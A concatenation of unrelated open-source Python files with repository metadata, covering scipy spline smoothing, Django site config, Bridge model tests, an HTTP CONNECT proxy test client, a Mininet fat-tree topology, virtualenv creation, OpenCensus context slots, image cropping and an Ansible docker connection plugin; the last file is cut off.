airekans/Snippet | python/numpy_scipy_learning/spline.py | 1 | 1310 | import numpy as np
import scipy as sp
from scipy.interpolate import UnivariateSpline
import matplotlib.pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7]
y = [1, 4, 9, 16, 26, 30, 51]
# Test Spline
trajectory = np.array([x, y], dtype=float)
print trajectory
plt.plot(trajectory[0], trajectory[1])
plt.show()
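# Note (added for clarity): UnivariateSpline's smoothing factor `s` trades off
# closeness of fit against smoothness; s=0 forces interpolation through every
# point, while the larger values used below (s=1, s=2) give progressively
# smoother curves.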
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1])
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
print smoothTrajectory
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 2
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=1)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 3
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=2)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
| unlicense | -259,108,058,511,957,630 | 21.20339 | 70 | 0.726718 | false |
arky/pootle-dev | pootle/apps/pootle_misc/siteconfig.py | 1 | 1832 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2004-2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
"""
NOTE: Import this file in your urls.py or some place before any code relying on
settings is imported.
"""
from django.contrib.sites.models import Site
from djblets.siteconfig.django_settings import (apply_django_settings,
generate_defaults)
from djblets.siteconfig.models import SiteConfiguration
SETTINGS_MAP = {
# siteconfig key settings.py key
'DESCRIPTION': 'DESCRIPTION',
'TITLE': 'TITLE',
}
def load_site_config():
"""Set up the SiteConfiguration, provide defaults and sync settings."""
try:
siteconfig = SiteConfiguration.objects.get_current()
except SiteConfiguration.DoesNotExist:
# Either warn or just create the thing. Depends on your app.
siteconfig = SiteConfiguration(site=Site.objects.get_current(),
version="1.0")
siteconfig.save()
if not siteconfig.get_defaults():
siteconfig.add_defaults(generate_defaults(SETTINGS_MAP))
apply_django_settings(siteconfig, SETTINGS_MAP)
return siteconfig
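# Hypothetical usage sketch (added; not part of the original module). As the
# module docstring says, call this early -- e.g. from urls.py -- before any code
# that relies on the synced settings is imported:
#   from pootle_misc.siteconfig import load_site_config
#   siteconfig = load_site_config()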
| gpl-2.0 | -3,864,998,015,168,332,000 | 33.566038 | 79 | 0.696507 | false |
uw-it-aca/uw-restclients | restclients/test/bridge/models.py | 1 | 5687 | from datetime import datetime
from django.test import TestCase
from django.utils.dateparse import parse_datetime
from restclients.exceptions import DataFailureException
from restclients.models.bridge import BridgeUser, BridgeCustomField,\
BridgeUserRole
from restclients.test import fdao_pws_override
class TestBridgeModel(TestCase):
def test_bridge_user_role(self):
role = BridgeUserRole(role_id='user', name='user')
self.assertEqual(role.to_json(),
{"id": "user", "name": "user"})
def test_bridge_custom_field(self):
bcf = BridgeCustomField(value_id="1",
field_id="5",
name="Regid",
value="787")
self.assertEqual(bcf.to_json(),
{'id': '1',
'value': '787',
'custom_field_id': '5'})
self.assertTrue(bcf.is_regid())
self.assertEqual(bcf.value, '787')
bcf = BridgeCustomField(field_id="5",
name="REGID")
self.assertEqual(bcf.to_json(),
{'custom_field_id': '5',
'value': None})
self.assertIsNotNone(str(bcf))
bcf = BridgeCustomField(field_id="5",
name="REGID",
value="787")
self.assertEqual(bcf.to_json(),
{'custom_field_id': '5',
'value': '787'})
def test_bridge_user(self):
bcf = BridgeCustomField(
field_id="5",
name="REGID",
value="12345678901234567890123456789012")
user = BridgeUser()
user.netid = "iamstudent"
user.full_name = "Iam Student"
user.first_name = "Iam A"
user.last_name = "Student"
user.email = "[email protected]"
user.custom_fields.append(bcf)
user.updated_at = parse_datetime("2016-08-08T13:58:20.635-07:00")
self.assertIsNotNone(str(user))
self.assertFalse(user.has_course_summary())
self.assertFalse(user.no_learning_history())
self.assertEqual(user.get_uid(), "[email protected]")
user = BridgeUser()
user.netid = "iamstudent"
user.full_name = "Iam Student"
user.email = "[email protected]"
user.custom_fields.append(bcf)
user.completed_courses_count = 3
self.assertTrue(user.has_course_summary())
self.assertFalse(user.no_learning_history())
self.assertIsNotNone(str(user))
def test_to_json_patch(self):
user = BridgeUser(netid="iamstudent",
full_name="Iam Student",
first_name="Iam A",
last_name="Student",
email="[email protected]"
)
json_patch = user.to_json_patch()
self.assertEqual(
user.to_json_patch(),
{'user': {
'uid': '[email protected]',
'email': '[email protected]',
'first_name': 'Iam A',
'last_name': 'Student',
'full_name': 'Iam Student'}})
user.bridge_id = 123
self.assertTrue(user.has_bridge_id())
self.assertEqual(
user.to_json_patch(),
{'user': {
'id': 123,
'uid': '[email protected]',
'email': '[email protected]',
'full_name': 'Iam Student',
'first_name': 'Iam A',
'last_name': 'Student'}})
bcf = BridgeCustomField(field_id="5",
name="REGID",
value="12345678901234567890123456789012")
user.custom_fields.append(bcf)
json_patch = user.to_json_patch()
self.assertEqual(
user.to_json_patch(),
{'user': {
'id': 123,
'uid': '[email protected]',
'email': '[email protected]',
'first_name': 'Iam A',
'last_name': 'Student',
'full_name': 'Iam Student',
'custom_fields': [
{'custom_field_id': '5',
'value': '12345678901234567890123456789012'}],
}})
def test_to_json_post(self):
bcf = BridgeCustomField(field_id="5",
name="REGID",
value="12345678901234567890123456789012")
user = BridgeUser(netid="iamstudent",
full_name="Iam Student",
email="[email protected]"
)
user.custom_fields.append(bcf)
json_post = user.to_json_post()
self.assertEqual(
user.to_json_post(),
{'users': [{
'uid': '[email protected]',
'email': '[email protected]',
'full_name': 'Iam Student',
'custom_fields': [
{'custom_field_id': '5',
'value': '12345678901234567890123456789012'}],
}]})
user.bridge_id = 123
self.assertEqual(
user.to_json_post(),
{'users': [{
'id': 123,
'uid': '[email protected]',
'email': '[email protected]',
'full_name': 'Iam Student',
'custom_fields': [
{'custom_field_id': '5',
'value': '12345678901234567890123456789012'}],
}]})
| apache-2.0 | 7,133,562,859,963,257,000 | 37.167785 | 73 | 0.472305 | false |
kenshinx/rps | test/http_client.py | 1 | 4579 | #! /usr/bin/env python
import re
import socket
import optparse
HTTP_PROXY_HOST = "dev1"
HTTP_PROXY_PORT = 8889
HTTP_PROXY_HOST = "localhost"
HTTP_PROXY_PORT = 9891
HTTP_PROXY_UNAME = "rps"
HTTP_PROXY_PASSWD = "secret"
class HTTPTunnelPorxy(object):
pattern = re.compile("^HTTP\/1\.\d ([0-9]{3}) .*")
def __init__(self, proxy_host, proxy_port, proxy_uname, proxy_passwd):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.s.connect((proxy_host, proxy_port))
except:
print "can't connect porxy: %s:%d" %(proxy_host, proxy_port)
exit(1);
self.uname = proxy_uname;
self.passwd = proxy_passwd;
def handshake(self, host, port):
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "handshake success"
return True
elif code == "407":
return self.authenticate(host, port)
else:
print "invalid http response code"
return False
def authenticate(self, host, port):
credential = "%s:%s" %(self.uname, self.passwd)
        credential = credential.encode("base64").strip()  # drop the trailing newline added by the base64 codec
credential = "Basic %s" %credential
print credential
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "Proxy-Authorization: %s\r\n" %credential
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "http authenticate success"
return True
elif code == "407":
print "http authenticate fail"
return False
else:
print "invalid http response code"
return False
def doHTTPRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET / HTTP/1.1\r\n"
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doHTTPSRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET https://%s HTTP/1.1\r\n" %host
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doWhoisRequest(self, host, port, query):
if not self.handshake(host, port):
return
payload = "%s\r\n" %query
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: \n"
print data
def main():
proxy = HTTPTunnelPorxy(HTTP_PROXY_HOST, HTTP_PROXY_PORT,
HTTP_PROXY_UNAME, HTTP_PROXY_PASSWD)
proxy.doHTTPRequest("www.google.com", 80)
#proxy.doHTTPSRequest("www.google.com", 80)
#proxy.doWhoisRequest("whois.godaddy.com", 43, "kenshinx.me")
if __name__ == "__main__":
main()
| mit | -7,370,360,084,969,663,000 | 24.581006 | 74 | 0.505569 | false |
calee0219/Course | SDN/Lab1/FatTreeTopoHardCode.py | 1 | 4467 | #!/usr/bin/env python
from mininet.topo import Topo
from mininet import net
from mininet.net import Mininet
POD_NUM = 4
class FatTreeTopoHardCode(Topo):
"""
A Simple FatTree Topo
"""
def __init__(self):
# Initialize topology
Topo.__init__(self)
# Create pod and core
## p0
p0h1 = self.addHost('p0h1')
p0h2 = self.addHost('p0h2')
p0h3 = self.addHost('p0h3')
p0h4 = self.addHost('p0h4')
## Edge Switch
p0e1 = self.addSwitch('p0e1')
p0e2 = self.addSwitch('p0e2')
## Aggregation
p0a1 = self.addSwitch('p0a1')
p0a2 = self.addSwitch('p0a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p0a1, p0e1, bw=100)
self.addLink(p0a1, p0e2, bw=100)
self.addLink(p0a2, p0e1, bw=100)
self.addLink(p0a2, p0e2, bw=100)
## Edge <-> Host
self.addLink(p0e1, p0h1, bw=100)
self.addLink(p0e1, p0h2, bw=100)
self.addLink(p0e2, p0h3, bw=100)
self.addLink(p0e2, p0h4, bw=100)
## p1
p1h1 = self.addHost('p1h1')
p1h2 = self.addHost('p1h2')
p1h3 = self.addHost('p1h3')
p1h4 = self.addHost('p1h4')
## Edge Switch
p1e1 = self.addSwitch('p1e1')
p1e2 = self.addSwitch('p1e2')
## Aggregation
p1a1 = self.addSwitch('p1a1')
p1a2 = self.addSwitch('p1a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p1a1, p1e1, bw=100)
self.addLink(p1a1, p1e2, bw=100)
self.addLink(p1a2, p1e1, bw=100)
self.addLink(p1a2, p1e2, bw=100)
## Edge <-> Host
self.addLink(p1e1, p1h1, bw=100)
self.addLink(p1e1, p1h2, bw=100)
self.addLink(p1e2, p1h3, bw=100)
self.addLink(p1e2, p1h4, bw=100)
## p2
p2h1 = self.addHost('p2h1')
p2h2 = self.addHost('p2h2')
p2h3 = self.addHost('p2h3')
p2h4 = self.addHost('p2h4')
## Edge Switch
p2e1 = self.addSwitch('p2e1')
p2e2 = self.addSwitch('p2e2')
## Aggregation
p2a1 = self.addSwitch('p2a1')
p2a2 = self.addSwitch('p2a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p2a1, p2e1, bw=100)
self.addLink(p2a1, p2e2, bw=100)
self.addLink(p2a2, p2e1, bw=100)
self.addLink(p2a2, p2e2, bw=100)
## Edge <-> Host
self.addLink(p2e1, p2h1, bw=100)
self.addLink(p2e1, p2h2, bw=100)
self.addLink(p2e2, p2h3, bw=100)
self.addLink(p2e2, p2h4, bw=100)
## p3
p3h1 = self.addHost('p3h1')
p3h2 = self.addHost('p3h2')
p3h3 = self.addHost('p3h3')
p3h4 = self.addHost('p3h4')
## Edge Switch
p3e1 = self.addSwitch('p3e1')
p3e2 = self.addSwitch('p3e2')
## Aggregation
p3a1 = self.addSwitch('p3a1')
p3a2 = self.addSwitch('p3a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p3a1, p3e1, bw=100)
self.addLink(p3a1, p3e2, bw=100)
self.addLink(p3a2, p3e1, bw=100)
self.addLink(p3a2, p3e2, bw=100)
## Edge <-> Host
self.addLink(p3e1, p3h1, bw=100)
self.addLink(p3e1, p3h2, bw=100)
self.addLink(p3e2, p3h3, bw=100)
self.addLink(p3e2, p3h4, bw=100)
# Add core switch
p0c = self.addSwitch('p0c')
p1c = self.addSwitch('p1c')
p2c = self.addSwitch('p2c')
p3c = self.addSwitch('p3c')
# Link Core to pod
## p0c
self.addLink(p0c, p0a1, bw=1000, loss=2)
self.addLink(p0c, p1a1, bw=1000, loss=2)
self.addLink(p0c, p2a1, bw=1000, loss=2)
self.addLink(p0c, p3a1, bw=1000, loss=2)
## p1c
self.addLink(p1c, p0a1, bw=1000, loss=2)
self.addLink(p1c, p1a1, bw=1000, loss=2)
self.addLink(p1c, p2a1, bw=1000, loss=2)
self.addLink(p1c, p3a1, bw=1000, loss=2)
## p2c
self.addLink(p2c, p0a2, bw=1000, loss=2)
self.addLink(p2c, p1a2, bw=1000, loss=2)
self.addLink(p2c, p2a2, bw=1000, loss=2)
self.addLink(p2c, p3a2, bw=1000, loss=2)
## p3c
self.addLink(p3c, p0a2, bw=1000, loss=2)
self.addLink(p3c, p1a2, bw=1000, loss=2)
self.addLink(p3c, p2a2, bw=1000, loss=2)
self.addLink(p3c, p3a2, bw=1000, loss=2)
topos = {'fattree': (lambda: FatTreeTopoHardCode())}
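# Hypothetical invocation (added for illustration; not in the original file).
# With the `topos` dict above Mininet can load the topology directly; the
# bw/loss parameters require TC links:
#   sudo mn --custom FatTreeTopoHardCode.py --topo fattree --link tc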
| mit | -4,874,537,547,002,850,000 | 30.457746 | 52 | 0.544437 | false |
living180/vex | vex/make.py | 1 | 2367 | import os
import sys
import distutils.spawn
from vex.run import run
from vex import exceptions
PYDOC_SCRIPT = """#!/usr/bin/env python
from pydoc import cli
cli()
""".encode('ascii')
PYDOC_BATCH = """
@python -m pydoc %*
""".encode('ascii')
def handle_make(environ, options, make_path):
if os.path.exists(make_path):
# Can't ignore existing virtualenv happily because existing one
# might have different parameters and --make implies nonexistent
raise exceptions.VirtualenvAlreadyMade(
"virtualenv already exists: {0!r}".format(make_path)
)
ve_base = os.path.dirname(make_path)
if not os.path.exists(ve_base):
os.mkdir(ve_base)
elif not os.path.isdir(ve_base):
raise exceptions.VirtualenvNotMade(
"could not make virtualenv: "
"{0!r} already exists but is not a directory. "
"Choose a different virtualenvs path using ~/.vexrc "
"or $WORKON_HOME, or remove the existing file; "
"then rerun your vex --make command.".format(ve_base)
)
# TODO: virtualenv is usually not on PATH for Windows,
# but finding it is a terrible issue.
if os.name == 'nt' and not os.environ.get('VIRTUAL_ENV', ''):
ve = os.path.join(
os.path.dirname(sys.executable),
'Scripts',
'virtualenv'
)
else:
ve = 'virtualenv'
args = [ve, make_path]
if options.python:
if os.name == 'nt':
python = distutils.spawn.find_executable(options.python)
if python:
options.python = python
args += ['--python', options.python]
if options.site_packages:
args += ['--system-site-packages']
if options.always_copy:
args+= ['--always-copy']
returncode = run(args, env=environ, cwd=ve_base)
if returncode != 0:
raise exceptions.VirtualenvNotMade("error creating virtualenv")
if os.name != 'nt':
pydoc_path = os.path.join(make_path, 'bin', 'pydoc')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_SCRIPT)
perms = os.stat(pydoc_path).st_mode
os.chmod(pydoc_path, perms | 0o0111)
else:
pydoc_path = os.path.join(make_path, 'Scripts', 'pydoc.bat')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_BATCH)
| mit | -1,349,267,931,707,901,400 | 32.814286 | 72 | 0.600338 | false |
census-instrumentation/opencensus-python | context/opencensus-context/opencensus/common/runtime_context/__init__.py | 1 | 5207 | # Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import contextvars
except ImportError:
contextvars = None
import threading
__all__ = ['RuntimeContext']
class _RuntimeContext(object):
@classmethod
def clear(cls):
"""Clear all slots to their default value."""
raise NotImplementedError # pragma: NO COVER
@classmethod
def register_slot(cls, name, default=None):
"""Register a context slot with an optional default value.
:type name: str
:param name: The name of the context slot.
:type default: object
:param name: The default value of the slot, can be a value or lambda.
:returns: The registered slot.
"""
raise NotImplementedError # pragma: NO COVER
def apply(self, snapshot):
"""Set the current context from a given snapshot dictionary"""
for name in snapshot:
setattr(self, name, snapshot[name])
def snapshot(self):
"""Return a dictionary of current slots by reference."""
return dict((n, self._slots[n].get()) for n in self._slots.keys())
def __repr__(self):
return ('{}({})'.format(type(self).__name__, self.snapshot()))
def __getattr__(self, name):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
return slot.get()
def __setattr__(self, name, value):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
slot.set(value)
def with_current_context(self, func):
"""Capture the current context and apply it to the provided func"""
caller_context = self.snapshot()
def call_with_current_context(*args, **kwargs):
try:
backup_context = self.snapshot()
self.apply(caller_context)
return func(*args, **kwargs)
finally:
self.apply(backup_context)
return call_with_current_context
class _ThreadLocalRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
_thread_local = threading.local()
def __init__(self, name, default):
self.name = name
self.default = default if callable(default) else (lambda: default)
def clear(self):
setattr(self._thread_local, self.name, self.default())
def get(self):
try:
return getattr(self._thread_local, self.name)
except AttributeError:
value = self.default()
self.set(value)
return value
def set(self, value):
setattr(self._thread_local, self.name, value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
class _AsyncRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
def __init__(self, name, default):
self.name = name
self.contextvar = contextvars.ContextVar(name)
self.default = default if callable(default) else (lambda: default)
def clear(self):
self.contextvar.set(self.default())
def get(self):
try:
return self.contextvar.get()
except LookupError:
value = self.default()
self.set(value)
return value
def set(self, value):
self.contextvar.set(value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
RuntimeContext = _ThreadLocalRuntimeContext()
if contextvars:
RuntimeContext = _AsyncRuntimeContext()
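# Illustrative usage sketch (added; the slot name and callable are hypothetical):
#   RuntimeContext.register_slot('correlation_id', default=None)
#   RuntimeContext.correlation_id = 'abc-123'
#   wrapped = RuntimeContext.with_current_context(some_callable)
#   # `wrapped` re-applies the snapshot captured above whenever it is invoked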
| apache-2.0 | 6,168,054,212,656,618,000 | 28.418079 | 78 | 0.580757 | false |
google-research/tensor2robot | preprocessors/distortion.py | 1 | 4670 | # coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared utils for image distorton and cropping."""
from tensor2robot.preprocessors import image_transformations
import tensorflow.compat.v1 as tf
def maybe_distort_image_batch(images, mode):
"""Applies data augmentation to given images.
Args:
images: 4D Tensor (batch images) or 5D Tensor (batch of image sequences).
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
Returns:
Distorted images. Image distortion is identical for every image in the
batch.
"""
if mode == tf.estimator.ModeKeys.TRAIN:
images = image_transformations.ApplyPhotometricImageDistortions([images])[0]
return images
def preprocess_image(image,
mode,
is_sequence,
input_size,
target_size,
crop_size=None,
image_distortion_fn=maybe_distort_image_batch):
"""Shared preprocessing function for images.
Args:
image: A tf.Tensor for the input images, which is either a 4D Tensor (batch
of images) or 5D Tensor (batch of sequences). It is assumed that all
dimensions are constant, except the batch dimension.
mode: (modekeys) specifies if this is training, evaluation or prediction.
is_sequence: Should be True if input is a batch of sequences, and False
otherwise.
input_size: [h, w] of the input image
target_size: [h, w] of the output image, expected to be equal or smaller
than input size. If smaller, we do a crop of the image.
crop_size: [h, w] of crop size. If None, defaults to target_size.
image_distortion_fn: A function that takes an image tensor and the training
mode as input and returns an image tensor of the same size as the input.
Returns:
A tf.Tensor for the batch of images / batch of sequences. If mode == TRAIN,
this applies image distortion and crops the image randomly. Otherwise, it
does not add image distortion and takes a crop from the center of the image.
"""
leading_shape = tf.shape(image)[:-3]
# Must be tf.float32 to distort.
image = tf.image.convert_image_dtype(image, tf.float32)
if is_sequence:
# Flatten batch dimension.
image = tf.reshape(image, [-1] + image.shape[-3:].as_list())
crop_size = crop_size or target_size
image = crop_image(
image, mode, input_size=input_size, target_size=crop_size)
# Reshape to target size.
image = tf.image.resize_images(image, target_size)
# Convert dtype and distort.
image = image_distortion_fn(image, mode=mode)
# Flatten back into a sequence.
if is_sequence:
tail_shape = tf.constant(list(target_size) + [3])
full_final_shape = tf.concat([leading_shape, tail_shape], axis=0)
image = tf.reshape(image, full_final_shape)
return image
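# Illustrative call (added; the shapes are assumptions, not from the original file):
#   images = tf.zeros([8, 512, 640, 3], dtype=tf.uint8)
#   out = preprocess_image(images, tf.estimator.ModeKeys.TRAIN, is_sequence=False,
#                          input_size=(512, 640), target_size=(472, 472))
#   # -> float32 Tensor of shape [8, 472, 472, 3]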
def crop_image(img, mode, input_size=(512, 640), target_size=(472, 472)):
"""Takes a crop of the image, either randomly or from the center.
The crop is consistent across all images given in the batch.
Args:
img: 4D image Tensor [batch, height, width, channels].
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
input_size: (height, width) of input.
target_size: (height, width) of desired crop.
Returns:
img cropped to the desired size, randomly if mode == TRAIN and from the
center otherwise.
"""
if input_size == target_size:
# Don't even bother adding the ops.
return img
input_height, input_width = input_size
input_shape = (input_height, input_width, 3)
target_shape = target_size
if mode == tf.estimator.ModeKeys.TRAIN:
crops = image_transformations.RandomCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
else:
crops = image_transformations.CenterCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
return crops
| apache-2.0 | 1,685,826,182,705,913,300 | 36.96748 | 80 | 0.66788 | false |
huangminghuang/ansible-docker-connection | connection_plugins/docker.py | 1 | 3787 | # Connection plugin for configuring docker containers
# Author: Lorin Hochstein
#
# Based on the chroot connection plugin by Maykel Moya
import os
import subprocess
import time
from ansible import errors
from ansible.callbacks import vvv
class Connection(object):
def __init__(self, runner, host, port, *args, **kwargs):
self.host = host
self.runner = runner
self.has_pipelining = False
self.docker_cmd = "docker"
def connect(self, port=None):
""" Connect to the container. Nothing to do """
return self
def exec_command(self, cmd, tmp_path, sudo_user=None, sudoable=False,
executable='/bin/sh', in_data=None, become=None,
become_user=None):
""" Run a command on the local host """
# Don't currently support su
# if su or su_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via su")
if in_data:
raise errors.AnsibleError("Internal Error: this module does not "
"support optimized module pipelining")
# if sudoable and sudo_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via sudo")
if executable:
local_cmd = [self.docker_cmd, "exec", self.host, executable,
'-c', cmd]
else:
local_cmd = '%s exec "%s" %s' % (self.docker_cmd, self.host, cmd)
vvv("EXEC %s" % (local_cmd), host=self.host)
p = subprocess.Popen(local_cmd,
shell=isinstance(local_cmd, basestring),
cwd=self.runner.basedir,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return (p.returncode, '', stdout, stderr)
# Docker doesn't have native support for copying files into running
# containers, so we use docker exec to implement this
def put_file(self, in_path, out_path):
""" Transfer a file from local to container """
args = [self.docker_cmd, "exec", "-i", self.host, "bash", "-c",
"cat > %s" % format(out_path)]
vvv("PUT %s TO %s" % (in_path, out_path), host=self.host)
if not os.path.exists(in_path):
raise errors.AnsibleFileNotFound(
"file or module does not exist: %s" % in_path)
p = subprocess.Popen(args, stdin=open(in_path),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# HACK: Due to a race condition, this sometimes returns before
# the file has been written to disk, so we sleep for one second
time.sleep(1)
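        # Roughly equivalent shell invocation (comment added for clarity):
        #   docker exec -i <container> bash -c 'cat > /remote/path' < /local/path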
def fetch_file(self, in_path, out_path):
""" Fetch a file from container to local. """
# out_path is the final file path, but docker takes a directory, not a
# file path
out_dir = os.path.dirname(out_path)
args = [self.docker_cmd, "cp", "%s:%s" % (self.host, in_path), out_dir]
vvv("FETCH %s TO %s" % (in_path, out_path), host=self.host)
p = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# Rename if needed
actual_out_path = os.path.join(out_dir, os.path.basename(in_path))
if actual_out_path != out_path:
os.rename(actual_out_path, out_path)
def close(self):
""" Terminate the connection. Nothing to do for Docker"""
pass
| gpl-3.0 | 7,907,822,090,526,358,000 | 37.642857 | 79 | 0.567468 | false |
JeroenBosmans/nabu | nabu/processing/text_reader.py | 1 | 3606 | '''@file textreader.py
contains the Textreader class'''
import os
import numpy as np
class TextReader(object):
'''reads text from disk'''
def __init__(self, textfile, max_length, coder, base_pos=0,
end_pos=None):
'''TextReader constructor
Args:
textfile: the path to the file containing the text
max_length: the maximal length of a line
coder: a TargetCoder object
base_pos: the base postion where to start reading in the file
end_pos: optional maximal position in the file'''
self.max_length = max_length
self.coder = coder
#initialise the position to the beginning of the file
self.base_pos = base_pos
self.pos = base_pos
self.end_pos = end_pos or os.path.getsize(textfile)
if base_pos >= self.end_pos:
raise Exception('base position should come before end position')
#store the scp path
self.textfile = textfile
def get_utt(self):
'''read the next line of data specified in the scp file
Args:
pos: the desired position in the scp file in bytes
Returns:
- the line identifier
- the read line as a [length x 1] numpy array
- whether or not the read utterance is the last one
'''
#read a line
line_id, line, looped = self.read_line()
#encode the line
encoded = self.coder.encode(line)[:, np.newaxis]
return line_id, encoded, looped
def read_line(self):
'''read the next line of data specified in the scp file
Args:
pos: the desired position in the scp file in bytes
Returns:
- the line identifier
- the read line as a string
- whether or not the read utterance is the last one
'''
#create the utteance id
line_id = 'line%d' % self.pos
#read a line in the scp file
with open(self.textfile) as fid:
fid.seek(self.pos)
line = fid.readline().strip()
self.pos = fid.tell()
#if end of file is reached loop around
if self.pos >= self.end_pos:
looped = True
self.pos = self.base_pos
else:
looped = False
return line_id, line, looped
def split(self, numlines):
'''split of a part of the textreader
Args:
numlines: number of lines tha should be in the new textreader
Returns:
a Textreader object that contains the required number of lines
'''
#read the requested number of lines
self.pos = self.base_pos
for _ in range(numlines):
_, _, looped = self.get_utt()
if looped:
raise Exception('number of requested lines exeeds the content')
#create a new textreader with the appropriate boundaries
        textreader = TextReader(self.textfile, self.max_length, self.coder,
                                self.base_pos, self.pos)
#update the base position
self.base_pos = self.pos
return textreader
def as_dict(self):
'''return the reader as a dictionary'''
#save the position
pos = self.pos
#start at the beginning
self.pos = self.base_pos
asdict = dict()
looped = False
while not looped:
line_id, line, looped = self.read_line()
asdict[line_id] = line
#set the position back to the original
self.pos = pos
| mit | -8,119,472,119,550,117,000 | 27.619048 | 79 | 0.567388 | false |
zenieldanaku/pygpj | main.py | 1 | 1847 | import func.core.config as c
import func.core.intro as intro
from func.core.lang import t
from func.core.viz import subselector
from func.core.prsnj import Pj
from func.core.export import imprimir_clases
import os
def cargar_archivo(prompt, carpeta):
from func.data.setup import data as s
ars, nom = [], []
for ar in os.listdir(carpeta):
